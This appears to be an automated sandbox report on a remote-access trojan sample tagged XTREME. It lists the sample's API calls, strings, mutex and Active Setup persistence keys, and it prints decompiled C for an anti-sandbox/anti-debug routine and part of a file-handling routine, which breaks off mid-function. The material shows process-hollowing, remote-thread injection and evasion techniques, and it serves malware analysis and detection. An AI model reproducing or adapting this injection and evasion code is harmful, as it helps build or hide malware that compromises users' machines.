0x00c8a2ca
0x00c8a2e5
0x00c8a2ef
0x00c8a2f4
0x00c8a2fb
0x00c8a302
0x00c8a30c
0x00c8a316
0x00c8a316
0x00c8a2fb
0x00c8a25e
0x00c8a263
0x00c8a26d
0x00c8a277
0x00c8a277
0x00c8a22a
0x00c8a22c
0x00c8a22c
0x00c8a31b
0x00c8a31f
0x00c8a324
0x00c8a32b
0x00c8a32d
0x00c8a344
0x00c8a35a
0x00c8a362
0x00c8a370
0x00c8a379
0x00c8a3a1
0x00c8a3a1
0x00c8a35a
0x00c8a3b5
0x00c8a3ba
0x00c8a3c0
0x00c8a3c7
0x00c8a3ce
0x00c8a3d3
0x00c8a3d9
0x00c8a3db
0x00c8a3e9
0x00c8a401
0x00c8a408
0x00c8a416
0x00c8a42a
0x00c8a42a
0x00c8a434
0x00c8a43f
0x00c8a446
0x00c8a461
0x00c8a477
0x00c8a493
0x00c8a498
0x00c8a49e
0x00c8a4ad
0x00c8a4b4
0x00c8a4b6
0x00c8a4c0
0x00c8a4c7
0x00c8a4c7
0x00c8a4cc
0x00c8a4d3
0x00c8a4f9
0x00c8a4ff
0x00c8a504
0x00c8a509
0x00c8a50e
0x00c8a518
0x00c8a522
0x00c8a527
0x00c8a52e
0x00c8a530
0x00c8a538
0x00c8a53e
0x00c8a543
0x00c8a548
0x00c8a552
0x00c8a552
0x00c8a557
0x00c8a561
0x00c8a566
0x00c8a568
0x00c8a56d
0x00c8a572
0x00c8a576
0x00c8a57b
0x00c8a57d
0x00c8a57f
0x00c8a587
0x00c8a58d
0x00c8a592
0x00c8a597
0x00c8a5a1
0x00c8a5a1
0x00c8a5a6
0x00c8a5a9
0x00000000
0x00000000
0x00c8a5ab
0x00c8a5ae
0x00000000
0x00000000
0x00000000
0x00c8a5ae
0x00c8a5b9
0x00c8a5be
0x00c8a5c5
0x00c8a5c7
0x00c8a5cf
0x00c8a5d5
0x00c8a5df
0x00c8a5df
0x00c8a5e4
0x00c8a5e7
0x00c8a5e9
0x00c8a5eb
0x00c8a5f3
0x00c8a600
0x00c8a600
0x00c8a5eb
0x00000000
0x00c8a4d5
0x00c8a4d5
0x00c8a4db
0x00c8a4e5
0x00c8a4ef
0x00c8a605
0x00c8a607
0x00c8a60a
0x00c8a60d
0x00c8a61d
0x00c8a62a
0x00c8a62a

APIs

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83721
Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83775

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C82F90: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
Part of subcall function 00C82F90: RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C82FBF
Part of subcall function 00C82F90: RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C82FCE

Part of subcall function 00C83B10: OpenProcess.KERNEL32(00000410,00000000,0000017C), ref: 00C83B23
Part of subcall function 00C83B10: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,0000017C), ref: 00C83B4D
Part of subcall function 00C83B10: 775C13F0.PSAPI(?,00000000,?,00000104,00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,0000017C), ref: 00C83B64
Part of subcall function 00C83B10: CloseHandle.KERNEL32(?), ref: 00C83B85

Part of subcall function 00C83094: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00C830BA
Part of subcall function 00C83094: CloseHandle.KERNEL32(00000000), ref: 00C830C0
Part of subcall function 00C83094: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302,00000002), ref: 00C830D3
Part of subcall function 00C83094: FindExecutableW.SHELL32(00000000,00000000,00000000), ref: 00C830DE
Part of subcall function 00C83094: DeleteFileW.KERNEL32(00000000,00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302), ref: 00C830E4

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

GetLastError.KERNEL32(00000000,00000000,DSma9HnKaPERSIST,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A17F
CloseHandle.KERNEL32(00000000), ref: 00C8A18C
CloseHandle.KERNEL32(00000000), ref: 00C8A1FD

Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

SetFileAttributesW.KERNEL32(00000000,00000080,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A362
CloseHandle.KERNEL32(000000D8), ref: 00C8A4FF

Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000), ref: 00C83CFC
Part of subcall function 00C83CE4: VirtualFreeEx.KERNEL32(0000017C,?,00000000,00008000), ref: 00C83D26
Part of subcall function 00C83CE4: VirtualAllocEx.KERNEL32(0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D35
Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D48
Part of subcall function 00C83CE4: WriteProcessMemory.KERNEL32(0000017C,?,00000000,00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D50
Part of subcall function 00C83CE4: CreateRemoteThread.KERNEL32(0000017C,00000000,00000000,?,?,00000000,?), ref: 00C83D71
Part of subcall function 00C83CE4: CloseHandle.KERNEL32(0000017C), ref: 00C83D77

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

GetModuleFileNameW.KERNEL32(00000000,svchost.exe,0000020A,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A416

Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,019A0000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83ED5
Part of subcall function 00C83EA8: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C83EFA
Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83F3B
Part of subcall function 00C83EA8: Sleep.KERNEL32(00000064), ref: 00C83F64

GetCurrentProcessId.KERNEL32(00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A452
CloseHandle.KERNEL32(000000D8), ref: 00C8A49E

Part of subcall function 00C84600: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C846D4
Part of subcall function 00C84600: Sleep.KERNEL32(000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00C848A9,?,00C8FCCC,00000000), ref: 00C846F4
Part of subcall function 00C84600: GetThreadContext.KERNEL32(?,?), ref: 00C84707
Part of subcall function 00C84600: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C84727
Part of subcall function 00C84600: NtUnmapViewOfSection.NTDLL(?,?), ref: 00C84737
Part of subcall function 00C84600: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000), ref: 00C84758
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8), ref: 00C84777
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?), ref: 00C84809
Part of subcall function 00C84600: VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?), ref: 00C8482C
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004,?), ref: 00C84854
Part of subcall function 00C84600: SetThreadContext.KERNEL32(?,?), ref: 00C84885
Part of subcall function 00C84600: ResumeThread.KERNEL32(?,?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004), ref: 00C8489A

Sleep.KERNEL32(000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C8A4C0
ExitProcess.KERNEL32(00000000,000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A4C7
CloseHandle.KERNEL32(000000D8), ref: 00C8A4DB

Part of subcall function 00C840F8: DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,00C8453A,?,00000000,00000001,00000000,00000351,00000000), ref: 00C84496
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C844E1
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00C844FA

TerminateProcess.KERNEL32(0000017C,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A5D5

Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(user32.dll), ref: 00C88BE5
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00C88BEF
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(wininet.dll), ref: 00C88BF9
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88C03
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(Shell32.dll), ref: 00C88C0D
Part of subcall function 00C88BC0: GetLastError.KERNEL32(00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000,00000000), ref: 00C88C25
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000), ref: 00C88C33
Part of subcall function 00C88BC0: Sleep.KERNEL32(0000000A,00000000), ref: 00C88DBC
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DD4
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DDD
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00C88DFF
Part of subcall function 00C88BC0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C88E18
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,open,?,00000000,00000000,00000000,?,?,0000000A,00000000), ref: 00C88E1F

Sleep.KERNEL32(000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A522
TerminateProcess.KERNEL32(0000017C,00000000,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000), ref: 00C8A53E
GetLastError.KERNEL32(00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C), ref: 00C8A568
CloseHandle.KERNEL32(00000000), ref: 00C8A576
TerminateProcess.KERNEL32(0000017C,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A58D
ShellExecuteW.SHELL32(00000000,open,00C30000,00000000,00000000,00000000), ref: 00C8A600

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Part of subcall function 00C87B84: SetFileAttributesW.KERNEL32(00320000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C1D
Part of subcall function 00C87B84: CreateFileW.KERNEL32(00320000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C87C37
Part of subcall function 00C87B84: GetFileSize.KERNEL32(00000000,00000000,00320000,80000000,00000001,00000000,00000003,00000000,00000000,00320000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C4A
Part of subcall function 00C87B84: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,00320000,80000000,00000001,00000000,00000003,00000000,00000000,00320000,00000080,00000000), ref: 00C87C6C
Part of subcall function 00C87B84: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00320000,80000000,00000001,00000000,00000003,00000000), ref: 00C87C7D
Part of subcall function 00C87B84: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C87C95
Part of subcall function 00C87B84: DeleteFileW.KERNEL32(00320000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00320000,80000000,00000001), ref: 00C87CEE
Part of subcall function 00C87B84: CloseHandle.KERNEL32(00000000), ref: 00C87D0F

Part of subcall function 00C83420: VirtualAlloc.KERNEL32(00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C83450
Part of subcall function 00C83420: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064), ref: 00C83463
Part of subcall function 00C83420: GetCommandLineW.KERNEL32(00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C8346A

Part of subcall function 00C83A54: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C83A65
Part of subcall function 00C83A54: Process32FirstW.KERNEL32(00000000,?), ref: 00C83A7A
Part of subcall function 00C83A54: CharUpperW.USER32(019A0000), ref: 00C83A94
Part of subcall function 00C83A54: CharUpperW.USER32(00000000), ref: 00C83AA4
Part of subcall function 00C83A54: CharUpperW.USER32(019A0000), ref: 00C83ABF
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ACA
Part of subcall function 00C83A54: Process32NextW.KERNEL32(00000000,?), ref: 00C83AEC
Part of subcall function 00C83A54: CloseHandle.KERNEL32(00000000), ref: 00C83AF6

Strings

C:\Windows\InstallDir\Server.exe, xrefs: 00C8A107
.xtr, xrefs: 00C8A3C2
Mutex, xrefs: 00C8A489
C:\Users\user\AppData\Roaming\Microsoft\Windows\DSma9HnKa.cfg, xrefs: 00C8A3A6
SOFTWARE\, xrefs: 00C8A472
DSma9HnKa, xrefs: 00C8A3B0, 00C8A44B
C:\Windows\InstallDir\, xrefs: 00C8A156
XTREME, xrefs: 00C8A42F
%DEFAULTBROWSER%, xrefs: 00C8A208
explorer.exe, xrefs: 00C8A383
Software\Microsoft\Active Setup\Installed Components\{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A133
SOFTWARE\, xrefs: 00C8A0CD
DSma9HnKaPERSIST, xrefs: 00C8A16F
{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A117
InstalledServer, xrefs: 00C8A0D9
Software\Microsoft\Active Setup\Installed Components\, xrefs: 00C8A11C
svchost.exe, xrefs: 00C8A196
svchost.exe, xrefs: 00C8A1A5, 00C8A1C2, 00C8A1D7, 00C8A40F, 00C8A420
local, xrefs: 00C8A3EF
DSma9HnKa, xrefs: 00C8A0C8

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C88918, Relevance: 43.7, APIs: 29, Instructions: 200

C-Code - Quality: 90%

			E00C88918(void* __edx, void* __edi, intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t15;
				long _t17;
				intOrPtr _t48;
				void* _t52;
				long _t53;
				intOrPtr* _t54;

				_t52 = __edi;
				_t48 = _a4;
				if( *((char*)(_t48 + 0x1541)) == 1) {
					_t15 = E00C882DC();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1542)) == 1) {
					_t15 = L00C88158(_t48, _t53);
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1543)) == 1) {
					_t15 = E00C88114();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				_t61 =  *((char*)(_t48 + 0x1544)) - 1;
				if( *((char*)(_t48 + 0x1544)) == 1) {
					_t15 = E00C881BC(_t48, _t52, _t53, _t61);
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1545)) == 1) {
					_t15 = E00C88300();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1546)) == 1) {
					_t15 = E00C88494();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1547)) == 1) {
					_t15 = E00C883DC();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1548)) == 1) {
					_t15 = E00C88324();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				_t71 =  *((char*)(_t48 + 0x1549)) - 1;
				if( *((char*)(_t48 + 0x1549)) == 1) {
					_t15 = E00C8854C(_t48, _t52, _t53, _t71);
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x154a)) == 1) {
					_t15 = E00C8887C();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x154b)) == 1) {
					_t15 = E00C886B0();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x154c)) == 1) {
					_t53 = GetTickCount();
					if(E00C88740(L00C88158) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C881BC) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C882DC) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C88300) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C88324) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C883DC) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C88494) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C8854C) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C886CC) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C88760) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C887A4) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C8887C) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C886B0) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C88114) != 0) {
						ExitProcess(0);
					}
					_t15 = E00C886CC(_t48);
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x154c)) != 1) {
					L70:
					return _t15;
				} else {
					E00C88760();
					_t17 = GetTickCount();
					_push(0);
					asm("cdq");
					 *_t54 =  *_t54 - _t53;
					asm("sbb [esp+0x4], edx");
					_t15 = _t17;
					if(0 != 0) {
						if(0 <= 0) {
							goto L70;
						}
						L69:
						ExitProcess(0);
						return _t15;
					}
					if(_t15 <= 0x1388) {
						goto L70;
					} else {
						goto L69;
					}
				}
			}

APIs

ExitProcess.KERNEL32(00000000), ref: 00C88934
ExitProcess.KERNEL32(00000000), ref: 00C8894D
ExitProcess.KERNEL32(00000000), ref: 00C88966
ExitProcess.KERNEL32(00000000), ref: 00C8897F
ExitProcess.KERNEL32(00000000), ref: 00C88998
ExitProcess.KERNEL32(00000000), ref: 00C889B1
ExitProcess.KERNEL32(00000000), ref: 00C889CA
ExitProcess.KERNEL32(00000000), ref: 00C889E3
ExitProcess.KERNEL32(00000000), ref: 00C889FC
ExitProcess.KERNEL32(00000000), ref: 00C88A15
ExitProcess.KERNEL32(00000000), ref: 00C88A2E
GetTickCount.KERNEL32(00000000), ref: 00C88A40
ExitProcess.KERNEL32(00000000), ref: 00C88A57
ExitProcess.KERNEL32(00000000), ref: 00C88A6C
ExitProcess.KERNEL32(00000000), ref: 00C88A81
ExitProcess.KERNEL32(00000000), ref: 00C88B78

Part of subcall function 00C88300: GetModuleHandleA.KERNEL32(dbghelp.dll,?,00C88992), ref: 00C88308

Part of subcall function 00C881BC: CloseHandle.KERNEL32(00000000), ref: 00C88272
Part of subcall function 00C881BC: CloseHandle.KERNEL32(00000000), ref: 00C88291

ExitProcess.KERNEL32(00000000), ref: 00C88A96
ExitProcess.KERNEL32(00000000), ref: 00C88AAB
GetTickCount.KERNEL32(00000000), ref: 00C88B8B

Part of subcall function 00C883DC: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C883F4
Part of subcall function 00C883DC: RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8841D
Part of subcall function 00C883DC: RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C88433

Part of subcall function 00C88494: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884AC
Part of subcall function 00C88494: RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884D5
Part of subcall function 00C88494: RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884EB

ExitProcess.KERNEL32(00000000), ref: 00C88AC0
ExitProcess.KERNEL32(00000000), ref: 00C88AD5
ExitProcess.KERNEL32(00000000), ref: 00C88BB2

Part of subcall function 00C8854C: GetUserNameA.ADVAPI32(00000000,?), ref: 00C88593

Part of subcall function 00C88324: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8833C
Part of subcall function 00C88324: RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C88365
Part of subcall function 00C88324: RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8837B

ExitProcess.KERNEL32(00000000), ref: 00C88AEA
ExitProcess.KERNEL32(00000000), ref: 00C88AFF
ExitProcess.KERNEL32(00000000), ref: 00C88B14
ExitProcess.KERNEL32(00000000), ref: 00C88B29
ExitProcess.KERNEL32(00000000), ref: 00C88B3E
ExitProcess.KERNEL32(00000000), ref: 00C88B53
ExitProcess.KERNEL32(00000000), ref: 00C88B68

Part of subcall function 00C882DC: GetModuleHandleA.KERNEL32(SbieDll.dll,?,00C8892E), ref: 00C882E4

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C873E0, Relevance: 21.2, APIs: 14, Instructions: 177
windowfile

C-Code - Quality: 98%

			E00C873E0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v9;
				void _v16;
				long _v24;
				long _v28;
				long _v32;
				long _v40;
				long _v44;
				char _v45;
				void _v46;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t43;
				long _t45;
				long _t46;
				long _t47;
				int _t48;
				struct HWND__* _t49;
				long _t51;
				void* _t52;
				void* _t59;
				void* _t61;
				int _t63;
				struct HWND__* _t64;
				WCHAR* _t92;
				long _t99;
				long _t100;
				void* _t103;
				void* _t104;
				long _t105;
				void* _t107;

				_t92 = __ecx;
				_v8 = __edx;
				_t103 = __eax;
				_v9 = 0;
				if( *0xc8dee8 == 0xffffffff) {
					L23:
					return _v9;
				}
				_v44 = 0;
				_v40 = 0;
				_t43 =  *0xc8dee8; // 0xd0
				_v28 = GetFileSize(_t43, 0);
				_v24 = 0;
				if(_v24 != 0) {
					if(__eflags <= 0) {
						L6:
						if(_v40 != 0) {
							if(__eflags <= 0) {
								goto L23;
							}
							L10:
							_t45 = E00C852E8(_t92);
							asm("cdq");
							 *0xc8b0c8 = _t45;
							 *0xc8b0cc = 0;
							_t46 =  *0xc8b0c8; // 0x0
							_t99 =  *0xc8b0cc; // 0x0
							__eflags = _t99 - _v40;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L15:
									_t47 =  *0xc8b0c8; // 0x0
									_t100 =  *0xc8b0cc; // 0x0
									__eflags = _t100 - _v40;
									if(_t100 != _v40) {
										L17:
										__eflags =  *0xc8b0b4;
										if( *0xc8b0b4 != 0) {
											_t48 =  *0xc8ded0; // 0xc1f2
											_t49 =  *0xc8b0b4; // 0x100164
											SendMessageA(_t49, _t48, 0, 0);
											_t51 =  *0xc8b0c8; // 0x0
											_t52 =  *0xc8dee8; // 0xd0
											SetFilePointer(_t52, _t51, 0, 0);
											_t105 = _v44;
											_v16 = VirtualAlloc(0, _t105 -  *0xc8b0c8, 0x1000, 4);
											_t59 =  *0xc8dee8; // 0xd0
											ReadFile(_t59, _v16, _t105 -  *0xc8b0c8,  &_v32, 0);
											_t61 =  *0xc8dee8; // 0xd0
											SetFilePointer(_t61, 0, 0, 2);
											_t63 =  *0xc8ded4; // 0xc1f3
											_t64 =  *0xc8b0b4; // 0x100164
											SendMessageA(_t64, _t63, 0, 0);
											SetFileAttributesW(_t92, 0x80);
											DeleteFileW(_t92);
											_t107 = CreateFileW(_t92, 0x40000000, 0, 0, 2, 0, 0);
											__eflags = _t107 - 0xffffffff;
											if(_t107 != 0xffffffff) {
												_v46 = 0xff;
												_v45 = 0xfe;
												WriteFile(_t107,  &_v46, 2,  &_v32, 0);
												__eflags = _v44 -  *0xc8b0c8;
												E00C85084(_t107, _v44 -  *0xc8b0c8, _v16, 0,  &_v32);
												VirtualFree( &_v16, 0, 0x8000);
											}
											CloseHandle(_t107);
											_v9 = E00C87918(_t103, _t92, _v8, _a4, _a8, _a12);
											__eflags = _v9 - 1;
											if(_v9 == 1) {
												 *0xc8b0c8 = _v44;
												 *0xc8b0cc = _v40;
												E00C853EC(_v44, _t92, _t107);
											}
											DeleteFileW(_t92);
										}
										goto L23;
									}
									__eflags = _t47 - _v44;
									if(_t47 == _v44) {
										goto L23;
									}
									goto L17;
								}
								L14:
								 *0xc8b0c8 = 0;
								 *0xc8b0cc = 0;
								E00C853EC(0, _t92, _t104);
								goto L17;
							}
							__eflags = _t46 - _v44;
							if(_t46 <= _v44) {
								goto L15;
							}
							goto L14;
						}
						if(_v44 > 0) {
							goto L10;
						}
						goto L23;
					}
					L5:
					_v44 = _v28;
					_v40 = _v24;
					goto L6;
				}
				if(_v28 <= 0) {
					goto L6;
				}
